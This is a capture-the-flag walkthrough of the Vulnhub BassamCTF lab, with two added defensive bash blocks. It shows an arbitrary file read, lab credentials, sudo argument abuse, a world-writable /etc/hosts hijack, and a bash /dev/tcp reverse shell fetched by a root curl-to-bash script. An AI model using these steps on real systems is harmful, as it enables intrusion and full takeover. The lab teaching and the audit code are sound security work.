
Vulnhub: BassamCTF target machine detailed walkthrough

Posted: 2023-02-12 18:46:27
Tags: Status 10.1 1.144 kali Vulnhub BassamCTF target-machine kira Size

BassamCTF

Target information

Name: bassamCTF: 1

Address:

https://www.vulnhub.com/entry/bassamctf-1,631/

Identifying the target host IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24   |   Screen View: Unique Hosts                                                                                            

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.1.1.1        00:50:56:c0:00:01      1      60  VMware, Inc.                                                                                             
 10.1.1.144      00:0c:29:d9:5e:2b      1      60  VMware, Inc.                                                                                             
 10.1.1.254      00:50:56:fd:b0:49      1      60  VMware, Inc.                                                                                             

Using netdiscover, which ships with Kali Linux, the target host IP address is identified as 10.1.1.144.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.144 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-12 03:06 EST
Nmap scan report for localhost (10.1.1.144)
Host is up (0.0021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5fcd98ac0e76bed09cae23478d03b507 (RSA)
|   256 f5cbdef089dcff568944053ca3448f70 (ECDSA)
|_  256 3a94cc9eaaab7d647126494802076230 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:D9:5E:2B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds

The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ curl http://10.1.1.144/                                                                                                
<!-- bassam.ctf --> 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ curl http://10.1.1.144/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 10.1.1.144 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ nikto -h http://10.1.1.144
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.144
+ Target Hostname:    10.1.1.144
+ Target Port:        80
+ Start Time:         2023-02-12 03:09:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7889 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-02-12 03:10:04 (GMT-5) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto brought no valuable information.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/12 03:10:41 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1097886 / 1102805 (99.55%)
===============================================================
2023/02/12 03:12:10 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/12 03:12:22 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
Progress: 708055 / 708545 (99.93%)
===============================================================
2023/02/12 03:13:23 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2023/02/12 04:05:12 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
Progress: 107501 / 311425 (34.52%)[ERROR] 2023/02/12 04:05:22 [!] parse "http://10.1.1.144/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:22 [!] parse "http://10.1.1.144/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:22 [!] parse "http://10.1.1.144/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:22 [!] parse "http://10.1.1.144/besalu\t.sh": net/url: invalid control character in URL
Progress: 119022 / 311425 (38.22%)[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:05:23 [!] parse "http://10.1.1.144/error\x1f_log.php": net/url: invalid control character in URL
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
Progress: 308640 / 311425 (99.11%)
===============================================================
2023/02/12 04:05:40 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2023/02/12 04:06:04 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
Progress: 95606 / 280825 (34.04%)[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/besalu\t.txt": net/url: invalid control character in URL
Progress: 101728 / 280825 (36.22%)[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/02/12 04:06:12 [!] parse "http://10.1.1.144/error\x1f_log.sh": net/url: invalid control character in URL
/index.html           (Status: 200) [Size: 21]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
Progress: 277116 / 280825 (98.68%)
===============================================================
2023/02/12 04:06:27 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/12 04:06:40 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 275]
/.htaccess.txt        (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htpasswd.sh         (Status: 403) [Size: 275]
/.htaccess.sh         (Status: 403) [Size: 275]
/.htpasswd.html       (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/.htpasswd.txt        (Status: 403) [Size: 275]
/.htaccess.html       (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 275]
Progress: 98617 / 102385 (96.32%)
===============================================================
2023/02/12 04:06:49 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://10.1.1.144 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.txt,.sh 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.1.144
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/02/12 04:06:59 Starting gobuster in directory enumeration mode
===============================================================
/.hta.php             (Status: 403) [Size: 275]
/.hta                 (Status: 403) [Size: 275]
/.hta.txt             (Status: 403) [Size: 275]
/.hta.html            (Status: 403) [Size: 275]
/.htaccess.txt        (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.hta.sh              (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/.htaccess.html       (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htaccess.sh         (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htpasswd.sh         (Status: 403) [Size: 275]
/.htpasswd.html       (Status: 403) [Size: 275]
/.htpasswd.txt        (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 21]
/index.html           (Status: 200) [Size: 21]
/server-status        (Status: 403) [Size: 275]
Progress: 23045 / 23570 (97.77%)
===============================================================
2023/02/12 04:07:01 Finished
===============================================================
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ dirb http://10.1.1.144

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Feb 12 04:07:13 2023
URL_BASE: http://10.1.1.144/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.1.1.144/ ----
+ http://10.1.1.144/index.html (CODE:200|SIZE:21)                                                                                                           
+ http://10.1.1.144/server-status (CODE:403|SIZE:275)                                                                                                       
                                                                                                                                                            
-----------------
END_TIME: Sun Feb 12 04:07:16 2023
DOWNLOADED: 4612 - FOUND: 2


Directory scanning found nothing.

This bassam.ctf might be a domain name; ugh.

Visiting http://bassam.ctf, the returned content changes: Welcome to my blog

Next, brute-force subdomains:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ wfuzz -u http://bassam.ctf -H "Host:FUZZ.bassam.ctf" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 3
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://bassam.ctf/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================

000000689:   400        12 L     53 W       422 Ch      "gc._msdcs"                                                                                 
000001000:   200        3 L      6 W        38 Ch       "welcome"                                                                                   
000003851:   200        1 L      3 W        21 Ch       "origin-images"    

Brute-forcing reveals the subdomain welcome; add it to the /etc/hosts file:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo vim /etc/hosts
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.1.1.144      bassam.ctf
10.1.1.144      welcome.bassam.ctf

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ curl http://welcome.bassam.ctf   
<html>
<!--open your eyes -->
</html>

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ gobuster dir -u http://welcome.bassam.ctf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://welcome.bassam.ctf
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              html,txt,sh,php
[+] Timeout:                 10s
===============================================================
2023/02/12 04:32:27 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 283]
/index.php            (Status: 200) [Size: 229]
/index.html           (Status: 200) [Size: 38]
/.html                (Status: 403) [Size: 283]
/config.php           (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 283]
/.html                (Status: 403) [Size: 283]
/server-status        (Status: 403) [Size: 283]
Progress: 1099675 / 1102805 (99.72%)
===============================================================
2023/02/12 04:34:07 Finished
===============================================================

The scan turns up /index.php, where you can enter a URL and then download it.

In the input box, enter only index.php, then download the file:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ mv ~/Downloads/index.php .
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat index.php                 
<?php
if($_SERVER['REQUEST_METHOD'] === 'POST'):
    $image = $_POST['url'];
    if($check === false):
    echo 'Error';
    else:
        $file = $image ;
        if (file_exists($file)) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($file).'"');
            header('Expires: 0');
            header('Cache-Control: must-revalidate');
            header('Pragma: public');
            header('Content-Length: ' . filesize($file));
            readfile($file);
            exit;
        }
    endif;
endif;

?>

<html>
<body>

<form action="" method="post">
url <input type=text name=url placeholder="image_url...">
<input type=submit value="download">
<!--https://github.com/kira2040k/MYCTF/blob/main/index.php-->
</form>

</body>
</html>
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ 
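
The handler above passes $_POST['url'] straight to file_exists() and readfile(); $check is never assigned, so the else branch always runs and any file the web server can read is served. The following function, added here and not part of the original post or of the target's code, shows the missing check as it would be written for a shell-side download helper: the requested name must resolve (after ../ and symlinks) to a regular file inside an allow-listed directory, and stream wrappers such as php:// or http:// are refused outright. The base directory name is an assumption; the PHP page gives none.

```bash
#!/bin/bash
# Added example (not from the original post): the containment check that the
# downloaded index.php lacks. Prints the canonical path and returns 0 when the
# request may be served, returns 1 otherwise.

# safe_download_path BASE_DIR REQUESTED
#   BASE_DIR  : directory downloads are restricted to (assumed, must exist)
#   REQUESTED : the untrusted value from the "url" form field
safe_download_path() {
    local base="$1" requested="$2"
    local base_real dir_real file_real

    # Refuse empty input and anything that looks like a URL or PHP stream
    # wrapper (php://filter, http://, file://, data:); a colon is never
    # needed in an image file name, so this rule is deliberately strict.
    [ -n "$requested" ] || return 1
    case "$requested" in
        *:*) return 1 ;;
    esac

    # Canonical form of the allow-listed directory (resolves symlinks).
    base_real=$(cd "$base" 2>/dev/null && pwd -P) || return 1

    # Absolute input is canonicalized as given (and then rejected by the
    # containment check); relative input is interpreted below BASE_DIR.
    case "$requested" in
        /*) file_real="$requested" ;;
        *)  file_real="$base_real/$requested" ;;
    esac

    # Resolve the directory part so that ../ and symlinked directories
    # collapse to their real location; the file itself must exist.
    dir_real=$(cd "$(dirname "$file_real")" 2>/dev/null && pwd -P) || return 1
    file_real="$dir_real/$(basename "$file_real")"

    # A symlink inside the directory could still point outside it.
    [ -L "$file_real" ] && return 1
    [ -f "$file_real" ] || return 1

    # Containment: the canonical path must start with BASE_DIR plus "/".
    case "$file_real" in
        "$base_real"/*) printf '%s\n' "$file_real"; return 0 ;;
        *) return 1 ;;
    esac
}
```

With this in place a request for config.php or /etc/passwd fails the containment check instead of being streamed back, which is the behaviour the downloaded handler needed.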

config.php was found during the directory scan; download it through this URL to the local Kali Linux machine:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ mv ~/Downloads/config.php .
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat config.php 
<?php
$user='test';
$pass='test123';
?>

Could these be the SSH username and password?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ ssh [email protected] 
The authenticity of host '10.1.1.144 (10.1.1.144)' can't be established.
ED25519 key fingerprint is SHA256:dElyCVED7FsqAhIBr7iBf2cIJv3xABqqPAY2ypUxHRY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.144' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Feb 12 09:40:08 UTC 2023

  System load:  0.01               Processes:            160
  Usage of /:   23.5% of 19.56GB   Users logged in:      0
  Memory usage: 48%                IP address for ens33: 10.1.1.144
  Swap usage:   0%


33 packages can be updated.
0 updates are security updates.


Last login: Sun Dec 13 10:38:10 2020 from 192.168.162.128
$ id
uid=1002(test) gid=1002(test) groups=1002(test)
$ 

$ ls -alh /var/www/ctf/MySecretPassword
-rw-r--r-- 1 root root 628 Dec 13  2020 /var/www/ctf/MySecretPassword
$ cd /home
$ ls -alh
total 20K
drwxr-xr-x  5 root   root   4.0K Dec 13  2020 .
drwxr-xr-x 25 root   root   4.0K Dec 13  2020 ..
drwxr-xr-x  2 bassam bassam 4.0K Dec 13  2020 bassam
drwxr-xr-x  5 kira   kira   4.0K Dec 13  2020 kira
drwxr-xr-x  4 test   test   4.0K Dec 13  2020 test
$ cd bassam
$ ls -alh
total 24K
drwxr-xr-x 2 bassam bassam 4.0K Dec 13  2020 .
drwxr-xr-x 5 root   root   4.0K Dec 13  2020 ..
-rw-r--r-- 1 bassam bassam  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 bassam bassam 3.7K Apr  4  2018 .bashrc
-rwxr-xr-x 1 root   root     47 Dec 13  2020 down.sh
-rw-r--r-- 1 bassam bassam  807 Apr  4  2018 .profile
$ cat down.sh
curl "http://mywebsite.test/script.sh" |bash 

$ pwd
/home/bassam
$ cd ..
$ cd kira
$ ls -alh
total 40K
drwxr-xr-x 5 kira kira 4.0K Dec 13  2020 .
drwxr-xr-x 5 root root 4.0K Dec 13  2020 ..
-rw------- 1 kira kira  162 Dec 13  2020 .bash_history
-rw-r--r-- 1 kira kira  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 kira kira 3.7K Apr  4  2018 .bashrc
drwx------ 2 kira kira 4.0K Dec 13  2020 .cache
drwx------ 3 kira kira 4.0K Dec 13  2020 .gnupg
drwxrwxr-x 3 kira kira 4.0K Dec 13  2020 .local
-rw-r--r-- 1 kira kira  807 Apr  4  2018 .profile
-rw-r--r-- 1 kira kira    0 Dec 13  2020 .sudo_as_admin_successful
-rwxr-xr-x 1 root root   78 Dec 13  2020 test.sh
$ cat test.sh
echo 'your name'
read name
echo  $name >/home/kali/message.txt
$1 2>/dev/null
$ 

test@kira:/PassProgram$ ./decoder /var/www/ctf/MySecretPassword 
[*] Variables ready to go!
[*] File handled successfully!
[~] WORD: kira2003
[!] DONE
test@kira:/PassProgram$ 

This should be user kira's password.

test@kira:/PassProgram$ su - kira
Password: 
kira@kira:~$ id
uid=1000(kira) gid=1000(kira) groups=1000(kira),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
kira@kira:~$ sudo -l
[sudo] password for kira: 
Matching Defaults entries for kira on kira:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kira may run the following commands on kira:
    (bassam) /home/kira/test.sh
kira@kira:~$ 

kira@kira:~$ sudo -u bassam /home/kira/test.sh /bin/bash
your name
id
/home/kira/test.sh: 3: /home/kira/test.sh: cannot create /home/kali/message.txt: Directory nonexistent
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
bash -i
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
/home/kira
/home/kira

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo vim /etc/hosts            
[sudo] password for kali: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat /etc/hosts                
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.1.1.144      bassam.ctf
10.1.1.144      welcome.bassam.ctf
10.1.1.143      mywebsite.test

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ vim script.sh
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ cat script.sh 
bash -i >& /dev/tcp/10.1.1.143/5555 0>&1
                                               
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kira

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ls -alh /etc/hosts
-rwxrwxrwx 1 root root 219 Dec 13  2020 /etc/hosts
echo '10.1.1.143     mywebsite.test' >> /etc/hosts
sudo /home/bassam/down.sh


Running the script achieves privilege escalation.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/BassamCTF]
└─$ sudo nc -nlvp 5555                                     
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.144] 58232
root@kira:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@kira:~# ls -alh
ls -alh
total 40K
drwxr-xr-x 5 kira kira 4.0K Dec 13  2020 .
drwxr-xr-x 5 root root 4.0K Dec 13  2020 ..
-rw------- 1 kira kira  276 Feb 12 10:11 .bash_history
-rw-r--r-- 1 kira kira  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 kira kira 3.7K Apr  4  2018 .bashrc
drwx------ 2 kira kira 4.0K Dec 13  2020 .cache
drwx------ 3 kira kira 4.0K Dec 13  2020 .gnupg
drwxrwxr-x 3 kira kira 4.0K Dec 13  2020 .local
-rw-r--r-- 1 kira kira  807 Apr  4  2018 .profile
-rw-r--r-- 1 kira kira    0 Dec 13  2020 .sudo_as_admin_successful
-rwxr-xr-x 1 root root   78 Dec 13  2020 test.sh
root@kira:~# cd /root
cd /root
root@kira:/root# ls -alh
ls -alh
total 32K
drwx------  5 root root 4.0K Dec 13  2020 .
drwxr-xr-x 25 root root 4.0K Dec 13  2020 ..
-rw-------  1 root root 1.7K Dec 13  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Dec 13  2020 Encoder
drwxr-xr-x  3 root root 4.0K Dec 13  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Dec 13  2020 .ssh
root@kira:/root#     
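
The root shell above comes from three weaknesses chained together: test.sh runs its first argument as a command and is sudo-runnable as bassam, /etc/hosts is world-writable (mode 777), and down.sh pipes curl output from mywebsite.test into bash as root. The audit below is added here (not the post's or the target's own code) and flags each of those conditions on a given script and hosts file, so a defender can catch the same pattern on a real host; the detection patterns are my own assumptions.

```bash
#!/bin/bash
# Added example (not from the original post): audit functions for the
# misconfigurations used in the escalation chain. Each function prints one
# finding per line and returns 0 when clean, 1 when something was flagged,
# 2 on an unreadable input, so it can run from cron or a CI job.

# audit_script FILE
#   Flags (a) curl/wget output piped straight into a shell interpreter, which
#   can be redirected through DNS or a hosts entry, and (b) a positional
#   parameter or "$@" used as the command itself, which turns a sudo rule for
#   the script into a sudo rule for whatever the caller names.
audit_script() {
    local file="$1" rc=0 n
    [ -r "$file" ] || { echo "ERROR: cannot read $file" >&2; return 2; }
    for n in $(grep -En '^[^#]*(curl|wget)[^|#]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$file" | cut -d: -f1); do
        echo "$file:$n: remote script piped into a shell (hijackable via DNS or /etc/hosts)"
        rc=1
    done
    for n in $(grep -En '^[[:space:]]*"?\$([0-9]+|@|\*)"?([[:space:]]|$)' "$file" | cut -d: -f1); do
        echo "$file:$n: script argument executed as a command"
        rc=1
    done
    return $rc
}

# audit_hosts_file FILE [DOMAIN...]
#   Flags a hosts file that non-root users can modify and any DOMAIN that is
#   statically pinned in it (a pinned name silently redirects every script
#   that fetches from that host, exactly what happened to mywebsite.test).
audit_hosts_file() {
    local file="$1" rc=0 perm owner d esc
    shift
    [ -e "$file" ] || { echo "ERROR: $file does not exist" >&2; return 2; }
    perm=$(ls -ld "$file" | cut -c1-10)       # e.g. -rwxrwxrwx
    owner=$(ls -ld "$file" | awk '{print $3}')
    case "$perm" in
        ????????w*) echo "$file: world-writable ($perm): any user can redirect hostnames"; rc=1 ;;
        ?????w*)    echo "$file: group-writable ($perm)"; rc=1 ;;
    esac
    [ "$owner" = root ] || { echo "$file: owned by $owner, not root"; rc=1; }
    for d in "$@"; do
        esc=$(printf '%s' "$d" | sed 's/\./\\./g')
        if grep -Eq "^[[:space:]]*[0-9a-fA-F.:]+[[:space:]]+([^#]*[[:space:]])?$esc([[:space:]]|$)" "$file"; then
            echo "$file: $d is statically mapped here, bypassing DNS"
            rc=1
        fi
    done
    return $rc
}

# Usage when run as a script: audit.sh SCRIPT HOSTS_FILE [DOMAIN...]
if [ "$#" -ge 2 ]; then
    script="$1"; hosts="$2"; shift 2
    audit_script "$script"; rc1=$?
    audit_hosts_file "$hosts" "$@"; rc2=$?
    [ "$rc1" -eq 0 ] && [ "$rc2" -eq 0 ]
fi
```

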